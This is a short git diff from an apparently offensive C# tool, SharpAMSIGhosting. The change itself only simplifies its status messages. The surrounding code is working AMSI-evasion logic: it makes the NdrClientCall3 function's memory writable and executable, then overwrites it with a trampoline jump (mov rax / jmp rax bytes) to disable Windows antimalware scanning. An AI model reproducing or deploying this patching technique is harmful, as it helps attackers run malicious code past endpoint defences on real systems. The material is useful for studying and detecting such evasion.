diff options
| -rw-r--r-- | SharpAMSIGhosting/Program.cs | 9 |
1 files changed, 4 insertions, 5 deletions
diff --git a/SharpAMSIGhosting/Program.cs b/SharpAMSIGhosting/Program.cs index 75fb518..c9405e6 100644 --- a/SharpAMSIGhosting/Program.cs +++ b/SharpAMSIGhosting/Program.cs @@ -84,10 +84,10 @@ namespace AmsiGhost bool protectResult = Mem.VirtualProtect(func, new UIntPtr(PATCH_SIZE), PAGE_EXECUTE_READWRITE, out oldProtect);
if (!protectResult)
{
- Console.WriteLine($"[-] Failed to unprotect {(func == Mem.GetProcAddress(lib, "NdrClientCall3") ? "NdrClientCall3" : "AmsiScanBuffer")} memory");
+ Console.WriteLine("[-] Failed to unprotect NdrClientCall3 memory");
return;
}
- Console.WriteLine($"[+] {(func == Mem.GetProcAddress(lib, "NdrClientCall3") ? "NdrClientCall3" : "AmsiScanBuffer")} memory unprotected");
+ Console.WriteLine("[+] NdrClientCall3 memory unprotected");
long trampAddr = trampoline.ToInt64();
byte[] patch = new byte[] { 0x48, 0xB8 }
@@ -95,9 +95,8 @@ namespace AmsiGhost .Concat(new byte[] { 0xFF, 0xE0 })
.ToArray();
Marshal.Copy(patch, 0, func, patch.Length);
- Console.WriteLine($"[+] Patch written to {(func == Mem.GetProcAddress(lib, "NdrClientCall3") ? "NdrClientCall3" : "AmsiScanBuffer")}");
-
- Console.WriteLine($"[+] {(func == Mem.GetProcAddress(lib, "NdrClientCall3") ? "NdrClientCall3" : "AmsiScanBuffer")} patched - AMSI Ghosting");
+ Console.WriteLine("[+] Patch written to NdrClientCall3");
+ Console.WriteLine("[+] NdrClientCall3 patched - AMSI ghosting complete");
}
catch (Exception ex)
{
|